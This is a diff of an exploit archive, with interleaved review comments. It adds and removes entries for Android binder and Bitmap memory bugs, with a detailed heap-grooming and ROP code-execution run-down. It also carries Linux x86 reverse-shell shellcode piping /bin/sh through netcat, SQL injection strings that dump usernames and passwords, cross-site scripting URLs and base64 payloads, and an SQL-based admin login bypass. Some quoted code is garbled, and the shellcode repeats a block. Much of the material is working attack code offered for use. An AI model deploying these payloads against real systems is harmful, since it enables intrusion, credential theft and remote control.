4d M 00 . +0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 . +0064: 0c . 00 . 00 . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 . 2e . 00 . +0080: 70 p 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 . +BR_NOOP: +BR_TRANSACTION_COMPLETE: +BR_REPLY: + target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000 + pid 0 uid 1000 data 24 offs 8 +0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . +0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . + - type 73682a85 flags 0000017f ptr 0000000000000001 cookie 0000000000000000 +[0] got handle 00000001 +[0] creating an OMX +0000: 00 . 01 . 00 . 00 . 21 ! 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 . +0032: 61 a 00 . 2e . 00 . 49 I 00 . 4d M 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 . +0048: 50 P 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 53 S 00 . 65 e 00 . +0064: 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 . +BR_NOOP: +BR_TRANSACTION_COMPLETE: +BR_REPLY: + target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000 + pid 0 uid 1013 data 24 offs 8 +0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 02 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . +0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . + - type 73682a85 flags 0000017f ptr 0000000000000002 cookie 0000000000000000 +[0] got handle 00000002 +[0] creating node +0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 . +0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 . +0048: 58 X 00 . 00 . 00 . 4f O 4d M 58 X 2e . 67 g 6f o 6f o 67 g 6c l 65 e 2e . 67 g +0064: 73 s 6d m 2e . 64 d 65 e 63 c 6f o 64 d 65 e 72 r 00 . 00 . 85 . 2a * 62 b 73 s +0080: 7f . 01 . 00 . 00 . 
41 A 41 A 41 A 41 A 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . +0096: 00 . 00 . 00 . 00 . +BR_NOOP: +BR_INCREFS: + 0x7fe5862df8, 0x7fe5862e00 +BR_ACQUIRE: + 0x7fe5862e0c, 0x7fe5862e14 +BR_TRANSACTION_COMPLETE: +BR_NOOP: +BR_REPLY: + target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000 + pid 0 uid 1013 data 8 offs 0 +0000: 00 . 00 . 00 . 00 . 03 . 00 . 1e . 1d . +[0] got node 1d1e0003 +[0] triggering bug +0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 . +0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 . +0048: 58 X 00 . 00 . 00 . 03 . 00 . 1e . 1d . ba . 43 C 46 F 60 ` 00 . 00 . 00 . 00 . +0064: 00 . 00 . 00 . 00 . +BR_NOOP: +BR_TRANSACTION_COMPLETE: +BR_NOOP: +BR_DEAD_REPLY: + +And a corresponding crash in the mediaserver process: + +*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** +Build fingerprint: 'google/bullhead/bullhead:7.0/NRD91E/3234993:userdebug/dev-keys' +Revision: 'rev_1.0' +ABI: 'arm' +pid: 7454, tid: 7457, name: Binder:7454_1 >>> /system/bin/mediaserver <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x6a9e0014 + r0 6a9dffa8 r1 ea8e757c r2 ea43aa1a r3 0000000f + r4 e984f0c0 r5 8000101a r6 00000000 r7 ea43a981 + r8 604643ba r9 00000000 sl ea451f61 fp 00000000 + ip ea012658 sp e81d5660 lr e9faa527 pc ea42d834 cpsr 60030030 + +backtrace: + #00 pc 0001c834 /system/lib/libstagefright_omx.so (_ZN7android15OMXNodeInstance19enableNativeBuffersEj8OMX_BOOLS1_+131) + #01 pc 0009b8fb /system/lib/libmedia.so (_ZN7android5BnOMX10onTransactEjRKNS_6ParcelEPS1_j+3626) + #02 pc 000359c3 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+70) + #03 pc 0003d1bb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+702) + #04 pc 0003ce07 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+114) + #05 pc 
0003d31b /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+46) + #06 pc 0004f765 /system/lib/libbinder.so + #07 pc 0000e349 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+140) + #08 pc 00047003 /system/lib/libc.so (_ZL15__pthread_startPv+22) + #09 pc 00019e1d /system/lib/libc.so (__start_thread+6) + +Fixed in the November security bulletin at https://source.android.com/security/bulletin/2016-11-01.html + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip + diff --git a/platforms/android/remote/40874.txt b/platforms/android/remote/40874.txt new file mode 100755 index 000000000..b311e8082 --- /dev/null +++ b/platforms/android/remote/40874.txt 
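Review bot: platforms/android/dos/40876.txt names the affected class inconsistently. Its first sentence refers to `IOMXNodeInstance.cpp` and "the IOMXNodeInstance structure", but the quoted function is `OMXNodeInstance::enableNativeBuffers` and frame #00 of the backtrace is `_ZN7android15OMXNodeInstance19enableNativeBuffers...`; use one name throughout. The quoted source is also damaged as shown: `const_cast(` has lost its target type, and `InitOMXParams(¶ms)` and `OMX_SetParameter(mHandle, index, ¶ms)` should take the address of the `params` variable declared two lines earlier. The text says `portIndex` is used without validation but never states the size of `mSecureBufferType`, so a reader auditing a build cannot tell which values are in range; add the array bound that the check has to enforce.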
@@ -0,0 +1,91 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928 + +Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order to conserve memory, there exists a code path which allows Bitmaps to be shared between processes by providing an ashmem-mapped file descriptor containing the Bitmap's raw pixel data. + +The android.graphics.Bitmap class illegally assumes that the size of the ashmem region provided by the user matches the actual underlying size of the Bitmap. + +When un-flattening a Bitmap from a Parcel, the class first calculates the assumed size of the Bitmap from the user-provided dimensions. Then, it calls Parcel::readBlob in order to map the given ashmem file descriptor to the process's VAS. This mapping is done using the size calculated from the Bitmap's dimensions (and not the size of the underlying ashmem descriptor). + +Later, the Bitmap constructor internally stores the ashmem file descriptor and mapped memory address, along with the size of the mapping. However, instead of using the same calculated size which was used when mapping the shared memory region, it accidentally queries the ashmem region for its real size, like so: + + mPixelStorage.ashmem.size = ashmem_get_size_region(fd); + +This size can be completely controlled by an attacker (simply by calling ASHMEM_SET_SIZE), and may be arbitrary large. + +Later, when the Bitmap is GC-ed, the destructor triggers a call to Bitmap::doFreePixels which unmaps the Bitmap's data, by calling: + + munmap(mPixelStorage.ashmem.address, mPixelStorage.ashmem.size); + +This means that an attacker can cause the size of the unmapped region to be arbitrarily large, thus unmapping crucial regions in the remote process's VAS. + +One example of how this can be exploited is by unmapping the remote process's heap (which is directly after the mmap-ed ranges on the device I was working on). 
Then, the attacker can resend a large Bitmap which will be mapped over the (previously unmapped) heap, thus allowing the attacker to effectively replace the remote process's heap with controlled data. + +I've attached a short PoC which crashes system_server by repeatedly unmaps large memory regions. + +Suggested Fix: + +Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region. + + + +Here's a brief run-down of the exploit: + +1. The exploit begins by calling AudioService.unloadSoundEffects in order to close the SoundPool instance in system_server. This also closes any auxiliary threads (SoundPool, SoundPoolThread, etc.) that are associated with this pool. + +2. Now, we start "massaging" system_server's VAS. This is done by creating multiple "Notification" objects which contain Bitmaps that are of exactly the same size at a thread's stack, when created by the ART runtime. As the bitmaps are allocated by using "mmap", they will simply inhabit the highest memory address between mm->mmap_base and TASK_SIZE which contains a sufficiently large contiguous hole. Causing many allocations of the aforementioned size will ensure that any "holes" of this size in higher addresses are filled, and the remaining "mmap"-s of this size will be contiguous. + +3. Now that we are certain allocations of size THREAD_SIZE are contiguous, we replace one of notifications created in the previous stage with a notification containing a small (or empty) bitmap, and immediately send multiple dummy transactions to system_server in order to force garbage collection of the freed bitmap object. 
This will enable us to open up a "hole" in the contiguous allocations, like so: + +<--low high--> + ---------------------------------------------------------------- +| Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | + ---------------------------------------------------------------- + || + \/ +<--low high--> + ---------------------------------------------------------------- +| Bitmap | Bitmap ||||hole|||| Bitmap | Bitmap | Bitmap | Bitmap | + ---------------------------------------------------------------- + +4. Now that there's a THREAD_SIZE-sized hole opened up, we can call AudioSystem.loadSoundEffects() in order to re-create the SoundPool object within system_server. This will allocate a new "SoundPoolThread" thread in system_server, which (after brief initialization) enters a polling loop on a condition variable (or rather, a futex), waiting for messages to be enqueued. However, this thread's stack will be directly mmap-ed in our previously created hole, like so: + +<--low high--> + --------------------------------------------------------------------------- +| Bitmap | Bitmap |SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | + --------------------------------------------------------------------------- + +6. Now, similarly to step 3., we can free the chunk directly before the previously unmapped chunk, creating the following state: + +<--low high--> + ----------------------------------------------------------------------------- +| Bitmap ||||hole||||SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | + ----------------------------------------------------------------------------- + +6. Finally, we send our "poisoned" bitmap object, which should get allocated directly in front of the SoundPoolThread's stack. Then, we force garbage collection once more, resulting in both the bitmap and the SoundPoolThread's stack being unmapped. However, since the SoundPoolThread is still waiting on a futex, this is fine. 
Here's what this stage looks like: + +<--low high--> + -------------------------------------------------------------------------------- +| Bitmap |Poison Bitmap|SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | + -------------------------------------------------------------------------------- + || + \/ +<--low high--> + -------------------------------------------------------------------------------- +| Bitmap ||||||||||||||||hole||||||||||||||||| Bitmap | Bitmap | Bitmap | Bitmap | + -------------------------------------------------------------------------------- + +7. At this point we can enqueue another notification, this time backed by a specially crafted ashmem file, containing two separate pieces of information: + a. A chunk of position independent ARM/ARM64 code, followed by + b. A ROP stack +This notification will be of size THREAD_SIZE*2, and will therefore fill up the hole we just set up, resulting in the following state: + +<--low high--> + ------------------------------------------------------------------- +| Bitmap | PIC code | ROP Stack | Bitmap | Bitmap | Bitmap | Bitmap | + ------------------------------------------------------------------- + +8. Now, we can safely call AudioService.unloadSoundEffects() once more. This will signal the condition variable that SoundPoolThread was waiting on, but now when it returns it will be executing our own ROP stack. The ROP stack simply mmap-s the ashmem file descriptor with PROT_EXEC and jumps into it (essentially executing the PIC code we supplied). + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip diff --git a/platforms/cfm/webapps/27854.txt b/platforms/cfm/webapps/27854.txt deleted file mode 100755 index 2bf0f76c6..000000000 --- a/platforms/cfm/webapps/27854.txt +++ /dev/null 
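Review bot: the exploit run-down in platforms/android/remote/40874.txt has two consecutive steps numbered "6." (the one beginning "Now, similarly to step 3." should be 5), and step 4 calls `AudioSystem.loadSoundEffects()` while steps 1 and 8 use `AudioService.unloadSoundEffects`, so it is unclear which class the load call belongs to. Fix the numbering and use one class name. The "Suggested Fix" paragraph (store the calculated size in `mPixelStorage.ashmem.size` instead of calling `ashmem_get_size_region`) is the part a defender needs, yet the file does not say whether or where that fix shipped; add the bulletin or patch level, as 40876.txt does with its "Fixed in the November security bulletin" line.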
@@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/17941/info - -Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries. - -Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. - -http://www.example.com/Details.cfm?ProdID=[SQL] diff --git a/platforms/lin_x86/shellcode/40872.c b/platforms/lin_x86/shellcode/40872.c new file mode 100755 index 000000000..7e4a94743 --- /dev/null +++ b/platforms/lin_x86/shellcode/40872.c 
@@ -0,0 +1,113 @@ +/* +;author: Filippo "zinzloun" Bersani +;date: 05/12/2016 +;version: 1.0 +;X86 Assembly/NASM Syntax +;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit +; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit +; Linux bb32 4.4.0-45-generic 32bit + +; description: + get a reverse shell executing a shell script saved in tmp that execute netcat that reverse the shell to the listener, + considering that by now the default nc configuration does not permitt to execute (-e) command directly anymore + this is a different approach that permitt to execute not only netcat. + LIMITATION: size of the shellcode; the attacker has to have gained the privilege to execute commmand (/bin/bash) + + + +; see comment for details + +global _start + +section .text +_start: + + +CreateFile: + xor eax, eax ;zeroing + xor edx, edx + push eax ;NULL byte as string terminator + push 0x65782e2f ;name of file to be executed /tmp/.xe + push 0x706d742f + mov ebx, esp ;ebx point to pushed string + mov esi, esp ;save the name of the file for a later use + mov al,0x8 ;create the file... + mov cl,077o ;...with 77 permission in octal (to avoid 0) + int 0x80 + + jmp CallPop + +WriteString: + + pop ecx ;get the command string to write in the file, 3rd arg + mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg + mov dl,0x09 ;now we put value $0x09 into dl... + inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;) + mov byte [ecx+92],dl ;replace our R char with 0x0A * + + xor edx,edx + mov dl,93 ;len of the buffer to write, 4th arg ** + mov al,0x04 ;sys call to write the file + int 0x80 + mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg + mov dl,0x09 ;now we put value $0x09 into dl... 
+ inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;) + mov byte [ecx+92],dl ;replace our R char with 0x0A * + + xor edx,edx + mov dl,93 ;len of the buffer to write, 4th arg ** + mov al,0x04 ;sys call to write the file + int 0x80 + +CloseFile: + xor eax,eax + mov al, 0x6 ;close the stream file + int 0x80 + +ExecFile: + xor eax, eax + push eax ;push null into the stack + ;push ////bin/bash into the stack + push 0x68736162 + push 0x2f6e6962 + push 0x2f2f2f2f + + mov ebx,esp ;set the 1st arg /bin/bash from the stack + ;set up the args array + push eax ; null + push esi ; get the saved pointer to the /tmp/.xe + push ebx ; pointer to /bin/bash + mov ecx, esp ;set the args + + xor edx,edx + mov al, 0xb ;sys call 11 to execute the file + int 0x80 + +CallPop: + call WriteString + ;this string can be configured to execute other command too, you have only to adjust the length of the buffer (**) and the index of the char (R) to replace (*) + ;according to the length of the string + db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fR" + +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xd2\x50\x68\x2f\x2e\x78\x65\x68\x2f\x74\x6d\x70\x89\xe3\x89\xe6\xb0\x08\xb1\x3f\xcd\x80\xeb\x37\x59\x89" +"\xc3\xb2\x09\xfe\xc2\x88\x51\x5c\x31\xd2\xb2\x5d\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68" +"\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xc4\xff\xff\xff\x72\x6d\x20\x2d\x66" +"\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x63\x61\x74\x20\x2f\x74\x6d\x70\x2f" +"\x66\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x32\x3e\x26\x31\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x6e\x63\x20\x20\x6c\x6f" +"\x63\x61\x6c\x68\x6f\x73\x74\x20\x39\x39\x39\x39\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x52"; +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + 
+} diff --git a/platforms/linux/remote/40339.py b/platforms/linux/remote/40339.py index dcb3c5f90..cfa77deb9 100755 --- a/platforms/linux/remote/40339.py +++ b/platforms/linux/remote/40339.py @@ -1,4 +1,3 @@ - /* add by SpeeDr00t@Blackfalcon (jang kyoung chip) diff --git a/platforms/php/webapps/14979.txt b/platforms/php/webapps/14979.txt deleted file mode 100755 index b5b50f585..000000000 --- a/platforms/php/webapps/14979.txt +++ /dev/null @@ -1,28 +0,0 @@ -================================================================== -# Exploit Title: AlstraSoft AskMe Pro SQL Injection Vulnerability -# Date: 12/09/2010 -# Author: Amine_92 -# Email: amine92_16@hotmail.fr -# Software Link: http://www.alstrasoft.com/askme.htm -# Version: All Version -# Price: 99.99$ -# Tested on: Xp Sp 2 -# Home: Dark Zone Organization (www.v9b.org/vb) -================================================================== -SQL injection in AlstraSoft AskMe Pro - -Affected items: -http://www.Victime.com/forum_answer.php?que_id=[SQL] - -Example: --9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert-- - -Demo URL: -http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert-- - -================================================================== -Good Luck - -Tank's To : All Memeber Of Dark Zone & Administrator Emptyzero - -Don't Forget Our Brother In Gaza & Palestine \ No newline at end of file diff --git a/platforms/php/webapps/17050.txt b/platforms/php/webapps/17050.txt index f1ef80f0e..3cee1c793 100755 --- a/platforms/php/webapps/17050.txt +++ b/platforms/php/webapps/17050.txt @@ -47,7 +47,7 @@ function xpath(){document.forms["xml"].submit();} function xss(){document.forms["xss"].submit();}
-
+



Exploit XML Injection!

diff --git a/platforms/php/webapps/26110.txt b/platforms/php/webapps/26110.txt deleted file mode 100755 index fe3ef9a6d..000000000 --- a/platforms/php/webapps/26110.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/14499/info - -Gravity Board X (GBX) is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. - -An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -http://www.example.com/deletethread.php?board_id="> \ No newline at end of file diff --git a/platforms/php/webapps/38312.txt b/platforms/php/webapps/38312.txt deleted file mode 100755 index b01faa659..000000000 --- a/platforms/php/webapps/38312.txt +++ /dev/null 
@@ -1,15 +0,0 @@ -source: http://www.securityfocus.com/bid/57948/info - -AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. - -An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. - -AbanteCart 1.1.3 is vulnerable; other versions may also be affected. - -http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E - -http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product - -http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E - -http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/40877.txt b/platforms/php/webapps/40877.txt new file mode 100755 index 000000000..6ffa2bbfe --- /dev/null +++ b/platforms/php/webapps/40877.txt 
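Review bot: the deletion of platforms/php/webapps/38312.txt removes a record that the new 40877.txt does not replace. The deleted file states "AbanteCart 1.1.3 is vulnerable" and lists cross-site scripting through URL parameters of `index.php` (`limit`, `page`, `rt`, `sort`, `currency`, `product_id`, `manufacturer_id`, `s`, `token`), whereas 40877.txt covers version 1.2.7 and input passed through the base64-encoded `__e` field. If 38312 is being dropped as a duplicate, name the entry it duplicates; otherwise keep the file and its files.csv row.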
@@ -0,0 +1,27 @@ +# Exploit Title: AbanteCart 1.2.7 Stored XSS +# Date: 06-12-2016 +# Software Link: http://www.abantecart.com/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +By default all user input is escaped using `htmlspecialchars`. + +But we can pass `__e` value which is base64 encoded and unfortunatelly those datas are not cleaned. + +http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html + +2. Proof of Concept + +For example `address_1=">&` can be encoded as: `__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m`. + +So create new order and set `address_1` value as `__e` using for example Burp: + +``` +Content-Disposition: form-data; name="__e" + +YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m +``` \ No newline at end of file diff --git a/platforms/php/webapps/40882.txt b/platforms/php/webapps/40882.txt new file mode 100755 index 000000000..1890a82b1 --- /dev/null +++ b/platforms/php/webapps/40882.txt 
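Review bot: in section 2 of platforms/php/webapps/40877.txt the plaintext example `address_1=">&` does not match the base64 value given for `__e` on the same line. The markup between `">` and `&` has been lost, so the two halves of the example disagree; put the plaintext in a literal block so it survives rendering. Section 1 stops at "those datas are not cleaned" without naming a fixed version or a remedy. If the cause is as described, the remedy is to apply the same `htmlspecialchars` escaping to the fields after `__e` is decoded, and the file should say so. The file's title says "Stored XSS" while the files.csv row for 40877 says only "Cross-Site Scripting"; keep "Stored" in the row.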
@@ -0,0 +1,44 @@ +# Exploit Title: Edge SkateShop Authentication Bypass +# Date: 6/12/2016 +# Exploit Author: Delilah +# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html +# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip +# Tested on: xampp + +go to http://localhost/EdgeSketch/adminlogin.php + +username = admin' # + +password = anything + +# Proof of Concept: + +POST /EdgeSketch/adminlogin.php HTTP/1.1 +Host: 10.0.2.15 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://10.0.2.15/EdgeSketch/ +Cookie: PHPSESSID=5n96kq5kd17joptp1sivhm4tl4 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 60 + +admin_username=admin'%20#&admin_password=fdgdhf&admin_login= + + + +HTTP/1.1 200 OK +Date: Tue, 06 Dec 2016 16:10:00 GMT +Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 +X-Powered-By: PHP/5.6.28 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 107 +Connection: close +Content-Type: text/html; charset=UTF-8 + + diff --git a/platforms/windows/dos/40875.html b/platforms/windows/dos/40875.html new file mode 100755 index 000000000..dc1967b64 --- /dev/null +++ b/platforms/windows/dos/40875.html @@ -0,0 +1,64 @@ + + + + + + + diff --git a/platforms/windows/dos/40878.txt b/platforms/windows/dos/40878.txt new file mode 100755 index 000000000..08ef3b86e --- /dev/null +++ b/platforms/windows/dos/40878.txt 
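Review bot: the captured request in platforms/php/webapps/40882.txt still carries a `PHPSESSID` cookie value and `Host: 10.0.2.15`, while the steps above it use `http://localhost/EdgeSketch/adminlogin.php`. Replace the cookie with a placeholder and use one host. The title says "Edge SkateShop", but every path and the download link say EdgeSketch or edgesketch.zip; use the name from the vendor page. The response is quoted with `Content-Length: 107` and no body, so nothing in the file shows that the login succeeded, and the file never names the cause. The `admin' #` username suggests the `admin_username` value is concatenated into the login query; state that, so the entry documents what has to be fixed.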
@@ -0,0 +1,32 @@ +Source: http://blog.skylined.nl/20161201001.html + +Synopsis + +A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability. + +Known affected software and attack vectors + +Microsoft Edge 11.0.10240.16384 + +An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path. + +Repro: + +/